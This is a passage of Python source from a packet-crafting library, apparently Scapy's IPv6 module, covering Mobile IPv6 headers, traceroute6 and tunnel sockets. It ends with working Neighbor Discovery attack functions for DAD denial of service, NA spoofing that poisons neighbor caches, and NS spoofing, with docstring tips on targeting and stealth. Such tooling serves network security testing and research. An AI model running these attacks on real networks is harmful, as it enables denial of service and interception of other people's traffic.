    5: 'BU',
    6: 'BA',
    7: 'BE',
    8: 'Fast BU',
    9: 'Fast BA',
    10: 'Fast NA',
}
3166
3167# From http://www.iana.org/assignments/mobility-parameters
# Labels of the status values carried by Binding Acknowledgements
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
    128: 'Reason unspecified',
    129: 'Administratively prohibited',
    130: 'Insufficient resources',
    131: 'Home registration not supported',
    132: 'Not home subnet',
    133: 'Not home agent for this mobile node',
    134: 'Duplicate Address Detection failed',
    135: 'Sequence number out of window',
    136: 'Expired home nonce index',
    137: 'Expired care-of nonce index',
    138: 'Expired nonces',
    139: 'Registration type change disallowed',
    140: 'Mobile Router Operation not permitted',
    141: 'Invalid Prefix',
    142: 'Not Authorized for Prefix',
    143: 'Forwarding Setup failed (prefixes missing)',
    144: 'MIPV6-ID-MISMATCH',
    145: 'MIPV6-MESG-ID-REQD',
    146: 'MIPV6-AUTH-FAIL',
    147: 'Permanent home keygen token unavailable',
    148: 'CGA and signature verification failed',
    149: 'Permanent home keygen token exists',
    150: 'Non-null home nonce index expected',
}
3193
3194
class _MobilityHeader(Packet):
    """Common base of the IPv6 Mobility Header messages: it fills in the
    header length and the checksum once the packet has been built."""

    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Return header and payload with byte 1 set to the header length
        and bytes 4-5 set to the checksum. Each value is computed here
        only when its field ("len", "cksum") was left to None."""
        pkt = p + pay

        hdr_len = self.len
        if hdr_len is None:
            # Length in 8-byte units, not counting the first 8 bytes
            hdr_len = (len(pkt) - 8) // 8
        pkt = pkt[:1] + struct.pack("B", hdr_len) + pkt[2:]

        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, pkt)
        return pkt[:4] + struct.pack("!H", cksum) + pkt[6:]
3211
3212
class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """
    Catch-all Mobility Header message: the 6 common header bytes followed
    by the remaining message data kept as an opaque string in 'msg'.
    """
    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", None, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   # 'len' does not count the first 8 bytes of the header,
                   # so the whole message is 8 * (len + 1) bytes long. The
                   # 6 bytes above are already consumed, which leaves
                   # 8 * len + 2 bytes for 'msg' (2 bytes when len is 0,
                   # matching the default value).
                   StrLenField("msg", b"\x00" * 2,
                               length_from=lambda pkt: 8 * pkt.len + 2)]
3222
3223
class MIP6MH_BRR(_MobilityHeader):
    """Binding Refresh Request message (mhtype 0)."""
    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # Size of the options is derived from the 'len' field
        _OptionsField("options", [], MIP6OptUnknown, 8,
                      length_from=lambda p: 8 * p.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the hash value shared by BRR, BU and BA messages."""
        # Hack: BRR, BU and BA all return the same constant
        #       b"\x00\x08\x09" because a BA has to be matched with a BU
        #       and a BU with a BRR. --arno
        return b"\x00\x08\x09"
3242
3243
class MIP6MH_HoTI(_MobilityHeader):
    """Home Test Init message (mhtype 1), identified by its cookie."""
    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # Size of the options is derived from the 'len' field
        _OptionsField("options", [], MIP6OptUnknown, 16,
                      length_from=lambda p: 8 * (p.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Use the cookie as hash so that the matching answer is found."""
        return bytes_encode(self.cookie)
3260
3261
class MIP6MH_CoTI(MIP6MH_HoTI):
    """Care-of Test Init message: same layout as MIP6MH_HoTI."""
    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Use the cookie as hash so that the matching answer is found."""
        cookie = self.cookie
        return bytes_encode(cookie)
3268
3269
class MIP6MH_HoT(_MobilityHeader):
    """Home Test message (mhtype 3), sent in answer to a Home Test Init."""
    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # Size of the options is derived from the 'len' field
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda p: 8 * (p.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Use the cookie as hash, like the corresponding Init message."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if other is a Home Test Init with our cookie, else 0."""
        if not isinstance(other, MIP6MH_HoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3293
3294
class MIP6MH_CoT(MIP6MH_HoT):
    """Care-of Test message: same layout as MIP6MH_HoT."""
    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Use the cookie as hash, like the corresponding Init message."""
        cookie = self.cookie
        return bytes_encode(cookie)

    def answers(self, other):
        """Return 1 if other is a Care-of Test Init with our cookie."""
        if not isinstance(other, MIP6MH_CoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3307
3308
class LifetimeField(ShortField):
    """ShortField whose value is displayed in seconds (4 seconds/unit)."""

    def i2repr(self, pkt, x):
        """Return the human readable form of x, i.e. 4 * x seconds."""
        seconds = 4 * x
        return "%d sec" % seconds
3312
3313
class MIP6MH_BU(_MobilityHeader):
    """Binding Update message (mhtype 5)."""
    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        XShortField("seq", None),  # TODO: ShortNonceField
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        LifetimeField("mhtime", 3),  # unit == 4 seconds
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # Size of the options is derived from the 'len' field
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda p: 8 * p.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the hash value shared by BRR, BU and BA messages."""
        # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if other is a Binding Refresh Request, 0 otherwise."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0
3337
3338
class MIP6MH_BA(_MobilityHeader):
    """Binding Acknowledgement message (mhtype 6)."""
    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 6, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ByteEnumField("status", 0, bastatus),
        FlagsField("flags", "K", 3, "PRK"),
        XBitField("res2", None, 5),
        XShortField("seq", None),  # TODO: ShortNonceField
        XShortField("mhtime", 0),  # unit == 4 seconds
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # Size of the options is derived from the 'len' field
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda p: 8 * p.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the hash value shared by BRR, BU and BA messages."""
        # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        """
        Return 1 if this BA acknowledges the Binding Update 'other', i.e.
        the BU requested an acknowledgement and carries the same sequence
        number. Return 0 otherwise.
        """
        if not isinstance(other, MIP6MH_BU):
            return 0
        if not (other.mhtype == 5 and self.mhtype == 6):
            return 0
        if not other.flags & 0x1:  # Ack request flag must be set
            return 0
        return 1 if self.seq == other.seq else 0
3367
3368
# Values of the "status" field of a Binding Error message
_bestatus = {
    1: 'Unknown binding for Home Address destination option',
    2: 'Unrecognized MH Type value',
}
3371
3372# TODO: match Binding Error to its stimulus
3373
3374
class MIP6MH_BE(_MobilityHeader):
    """Binding Error message (mhtype 7)."""
    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        # Size of the options is derived from the 'len' field
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda p: 8 * (p.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}
3388
3389
# Maps a Mobility Header type value (mhtype) to the class implementing it
_mip6_mhtype2cls = {
    0: MIP6MH_BRR,
    1: MIP6MH_HoTI,
    2: MIP6MH_CoTI,
    3: MIP6MH_HoT,
    4: MIP6MH_CoT,
    5: MIP6MH_BU,
    6: MIP6MH_BA,
    7: MIP6MH_BE,
}
3398
3399
3400#############################################################################
3401#############################################################################
3402#                               Traceroute6                                 #
3403#############################################################################
3404#############################################################################
3405
class AS_resolver6(AS_resolver_riswhois):
    """AS resolver for IPv6 addresses, based on AS_resolver_riswhois."""

    def _resolve_one(self, ip):
        """
        Resolve one IPv6 address. For 6to4 and Teredo addresses, the
        Whois lookup is performed on the embedded IPv4 address; any other
        address is looked up as is.

        Returns a (ip, asn, desc) tuple where ip is the address given as
        argument and asn is converted to an int when it has the "AS<n>"
        form.
        """

        lookup = ip
        if in6_isaddr6to4(ip):
            # 6to4: the IPv4 address is stored in bytes 2 to 5
            packed = inet_pton(socket.AF_INET6, ip)
            lookup = inet_ntop(socket.AF_INET, packed[2:6])
        elif in6_isaddrTeredo(ip):
            # Teredo: use the mapped address
            lookup = teredoAddrExtractInfo(ip)[2]

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, lookup)

        if asn.startswith("AS"):
            number = asn[2:]
            try:
                asn = int(number)
            except ValueError:
                # Not a number after the prefix: keep the string as is
                pass

        return ip, asn, desc
3431
3432
class TracerouteResult6(TracerouteResult):
    """IPv6 flavour of TracerouteResult, as returned by traceroute6()."""
    __slots__ = []

    def show(self):
        """
        Build the result table: one column per probed destination, one
        line per hop limit, each cell showing the source of the answer.
        """
        # TODO: ICMPv6 !
        probe_fmt = ("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}"
                     "{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}")
        answer_fmt = ("%-42s,IPv6.src% {TCP:%TCP.flags%}"
                      "{ICMPv6DestUnreach:%ir,type%}"
                      "{ICMPv6PacketTooBig:%ir,type%}"
                      "{ICMPv6TimeExceeded:%ir,type%}"
                      "{ICMPv6ParamProblem:%ir,type%}"
                      "{ICMPv6EchoReply:%ir,type%}")
        return self.make_table(lambda s, r: (s.sprintf(probe_fmt),
                                             s.hlim,
                                             r.sprintf(answer_fmt)))

    def get_trace(self):
        """
        Return a dict mapping each destination to a
        {hlim: (source of the answer, final)} dict. 'final' is False when
        the answer is an ICMPv6 error (Time Exceeded, Destination
        Unreachable, Packet Too Big or Parameter Problem). Hops located
        after the first final answer are dropped.
        """
        trace = {}

        for s, r in self.res:
            if IPv6 not in s:
                continue
            hops = trace.setdefault(s[IPv6].dst, {})

            final = not (ICMPv6TimeExceeded in r or
                         ICMPv6DestUnreach in r or
                         ICMPv6PacketTooBig in r or
                         ICMPv6ParamProblem in r)

            hops[s[IPv6].hlim] = r[IPv6].src, final

        for hops in trace.values():
            try:
                first_final = min(x for x, y in hops.items() if y[1])
            except ValueError:
                # No final answer for that destination: keep all hops
                continue
            for hlim in list(hops):  # list(): hops is modified in the loop
                if hlim > first_final:
                    del hops[hlim]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """
        Same as TracerouteResult.graph(), using an IPv6 aware AS resolver
        by default. The value returned by the parent implementation is
        handed back to the caller instead of being dropped.
        """
        # NOTE: the default resolver is instantiated once, at definition
        # time, and shared by all calls.
        return TracerouteResult.graph(self, ASres=ASres, **kargs)
3474
3475
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6
    traceroute6(target, [maxttl=30], [dport=80], [sport=80])
        -> (TracerouteResult6, unanswered packets)

    When l4 is provided, it is used as upper layer of the probes instead
    of the default TCP one (no capture filter is set in that case).
    """
    verbose = conf.verb if verbose is None else verbose

    # One probe per hop limit value in [minttl, maxttl]
    base = IPv6(dst=target, hlim=(minttl, maxttl))

    if l4 is not None:
        answered, unanswered = sr(base / l4,
                                  timeout=timeout, verbose=verbose, **kargs)
    else:
        probes = base / TCP(seq=RandInt(), sport=sport, dport=dport)
        answered, unanswered = sr(probes,
                                  timeout=timeout, filter="icmp6 or tcp",
                                  verbose=verbose, **kargs)

    result = TracerouteResult6(answered.res)

    if verbose:
        result.show()

    return result, unanswered
3498
3499#############################################################################
3500#############################################################################
3501#                                  Sockets                                  #
3502#############################################################################
3503#############################################################################
3504
3505
if not WINDOWS:
    from scapy.supersocket import L3RawSocket

    class L3RawSocket6(L3RawSocket):
        """
        Layer 3 raw socket for IPv6: packets are emitted through an
        AF_INET6 raw socket and received through an AF_PACKET one.
        """

        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):  # noqa: E501
            # NOTE: if fragmentation is needed, it will be done by the
            # kernel (RFC 2292)
            # NOTE(review): filter, promisc and nofilter are accepted but
            # not used here, and the parent __init__ is not called.
            self.outs = socket.socket(socket.AF_INET6,
                                      socket.SOCK_RAW,
                                      socket.IPPROTO_RAW)
            self.ins = socket.socket(socket.AF_PACKET,
                                     socket.SOCK_RAW,
                                     socket.htons(type))
            self.iface = iface
3515
3516
def IPv6inIP(dst='203.178.135.36', src=None):
    """
    Configure the _IPv6inIP socket class with the IPv4 tunnel endpoints
    (dst and src) and return it.

    The current conf.L3socket is recorded as the class used to create the
    worker socket, unless it already is _IPv6inIP: in that case, the
    conf.L3socket setting is deleted.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP
3525
3526
class _IPv6inIP(SuperSocket):
    """
    Socket sending IPv6 packets encapsulated in IPv4 (protocol 41) via a
    worker socket of class 'cls', and decapsulating what it receives.
    """
    dst = '127.0.0.1'  # IPv4 address of the remote tunnel endpoint
    src = None  # IPv4 source address of the emitted packets
    cls = None  # class of the worker socket, set by IPv6inIP()

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):  # noqa: E501
        SuperSocket.__init__(self, family, type, proto)
        # Remaining keyword arguments are for the worker socket
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the tunnel endpoints (shared by all instances)."""
        _IPv6inIP.dst = dst
        _IPv6inIP.src = src

    def nonblock_recv(self):
        """Non blocking receive, with decapsulation."""
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        """Receive a packet from the worker, with decapsulation."""
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """
        Return the IPv6 payload of p if p is an IPv4 packet coming from
        the tunnel endpoint and carrying IPv6. Otherwise, p is returned
        unchanged (including when it is None).
        """
        # TODO: verify checksum
        if (isinstance(p, IP) and
                p.src == self.dst and
                p.proto == socket.IPPROTO_IPV6 and
                isinstance(p.payload, IPv6)):
            return p.payload
        return p

    def send(self, x):
        """Send x through the worker, encapsulated in an IPv4 packet."""
        tunnel = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(tunnel / x)
3560
3561
3562#############################################################################
3563#############################################################################
3564#                    Neighbor Discovery Protocol Attacks                    #
3565#############################################################################
3566#############################################################################
3567
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    reply_callback: called as reply_callback(req, reply_mac, iface) for
         each received NS that is part of a DAD procedure.

    iface: interface to sniff on; conf.iface is used when not provided.

    mac_src_filter: if set, only NS sent from that MAC address are
         considered.

    tgt_filter: if set, only NS for that target address are considered.
         The address can be given either in printable form (e.g.
         "2001:db8::1") or in packed (network) form.

    reply_mac: MAC address handed to the callback; it is also excluded
         from the capture. Defaults to the MAC address of iface.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        # (addresses are compared in packed form)
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # is_request() compares the target of the NS in packed form: a filter
    # given in printable form would never match, so convert it once here.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)
3618
3619
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756: incoming NS messages sent from the unspecified address are
    answered with a NS for the same target address, so that the peer
    believes another node is also performing DAD for that address.

    The fake NS sent for each received NS uses:
     - the target address found in the received NS as target address.
     - the unspecified address (::) as IPv6 source address.
     - the IPv6 destination address of the received NS, i.e. the
       link-local solicited-node multicast address derived from the
       target address, as IPv6 destination address.
     - the mac address of the interface (or reply_mac, see below) as
       source mac address.
     - the multicast mac address derived from the IPv6 destination
       address as destination mac address.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target
         by filtering on its mac address. The default value is None: the
         DoS is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address
         for received NS. If the target address in the NS message (not
         the IPv6 destination address) matches that address, then a fake
         reply will be sent, i.e. the emitter will be a target of the
         DoS.

    reply_mac: allow specifying a specific source mac address for the
         reply, i.e. to prevent the use of the mac address of the
         interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Callback answering a received NS with a similar NS
        """

        sender_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # Build the reply, reusing destination and target of the request
        reply = Ether(src=reply_mac)
        reply /= IPv6(src="::", dst=req[IPv6].dst)
        reply /= ICMPv6ND_NS(tgt=target)
        sendp(reply, iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (target, sender_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3674
3675
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756: incoming NS messages *sent from the unspecified address* are
    answered with a NA for the target address, so that the peer believes
    the address it is performing DAD for is already in use.

    The fake NA sent for each received NS uses:
     - the target address found in the received NS as target address.
     - the target address found in the received NS as IPv6 source
       address.
     - the IPv6 destination address of the received NS, i.e. the
       link-local solicited-node multicast address derived from the
       target address, as IPv6 destination address.
     - the mac address of the interface (or reply_mac, see below) as
       source mac address.
     - the multicast mac address derived from the IPv6 destination
       address as destination mac address.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target
         by filtering on its mac address. The default value is None: the
         DoS is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address
         for received NS. If the target address in the NS message (not
         the IPv6 destination address) matches that address, then a fake
         reply will be sent, i.e. the emitter will be a target of the
         DoS.

    reply_mac: allow specifying a specific source mac address for the
         reply, i.e. to prevent the use of the mac address of the
         interface. This address will also be used in the Target
         Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Callback answering a received NS with a NA
        """

        sender_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # Build the reply: the NA is sent from the target address to the
        # destination address of the request
        reply = Ether(src=reply_mac) / IPv6(src=target, dst=req[IPv6].dst)
        reply /= ICMPv6ND_NA(tgt=target, S=0, R=0, O=1)  # noqa: E741
        reply /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
        sendp(reply, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (target, sender_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3735
3736
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function sends
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination mac address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be given either in printable form (e.g. "2001:db8::1") or in
         packed (network) form.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        # Addresses are compared in packed form
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        pkt = req[IPv6]
        src = pkt.src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    if not iface:
        iface = conf.iface

    # is_request() compares the target of the NS in packed form: a filter
    # given in printable form would never match, so convert it once here.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)
3873
3874
3875def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3876                           dst=None, src_mac=None, dst_mac=None, loop=True,
3877                           inter=1, iface=None):
3878    """
3879    The main purpose of this function is to send fake Neighbor Solicitations
3880    messages to a victim, in order to either create a new entry in its neighbor
3881    cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3882    that a node SHOULD create the entry or update an existing one (if it is not
3883    currently performing DAD for the target of the NS). The entry's reachability  # noqa: E501
3884    state is set to STALE.
3885
3886    The two main parameters of the function are the source link-layer address
3887    (carried by the Source Link-Layer Address option in the NS) and the
3888    source address of the packet.
3889
3890    Unlike some other NDP_Attack_* function, this one is not based on a
3891    stimulus/response model. When called, it sends the same NS packet in loop
3892    every second (the default)
3893
3894    Following arguments can be used to change the format of the packets:
3895
3896    src_lladdr: the MAC address used in the Source Link-Layer Address option
3897         included in the NS packet. This is the address that the peer should
3898         associate in its neighbor cache with the IPv6 source address of the
3899         packet. If None is provided, the mac address of the interface is
3900         used.
3901
3902    src: the IPv6 address used as source of the packet. If None is provided,
3903         an address associated with the emitting interface will be used
3904         (based on the destination address of the packet).
3905
3906    target: the target address of the NS packet. If no value is provided,
3907         a dummy address (2001:db8::1) is used. The value of the target
3908         has a direct impact on the destination address of the packet if it
3909         is not overridden. By default, the solicited-node multicast address
3910         associated with the target is used as destination address of the
3911         packet. Consider specifying a specific destination address if you
3912         intend to use a target address different than the one of the victim.
3913
3914    dst: The destination address of the NS. By default, the solicited node
3915         multicast address associated with the target address (see previous
3916         parameter) is used if no specific value is provided. The victim
3917         is not expected to check the destination address of the packet,
3918         so using a multicast address like ff02::1 should work if you want
3919         the attack to target all hosts on the link. On the contrary, if
3920         you want to be more stealth, you should provide the target address
3921         for this parameter in order for the packet to be sent only to the
3922         victim.
3923
3924    src_mac: the MAC address used as source of the packet. By default, this
3925         is the address of the interface. If you want to be more stealth,
3926         feel free to use something else. Note that this address is not the
3927         that the victim will use to populate its neighbor cache.
3928
3929    dst_mac: The MAC address used as destination address of the packet. If
3930         the IPv6 destination address is multicast (all-nodes, solicited
3931         node, ...), it will be computed. If the destination address is
3932         unicast, a neighbor solicitation will be performed to get the
3933         associated address. If you want the attack to be stealth, you
3934         can provide the MAC address using this parameter.
3935
3936    loop: By default, this parameter is True, indicating that NS packets
